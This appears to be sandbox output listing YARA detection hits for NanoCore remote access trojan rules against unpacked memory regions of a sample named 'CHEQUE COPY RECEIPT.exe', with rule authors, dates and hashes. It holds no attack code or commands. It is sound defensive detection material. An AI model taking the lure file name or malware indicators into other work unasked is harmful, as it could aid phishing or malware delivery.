Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.22ccc70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.22ccc70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.230ba34.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.230ba34.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
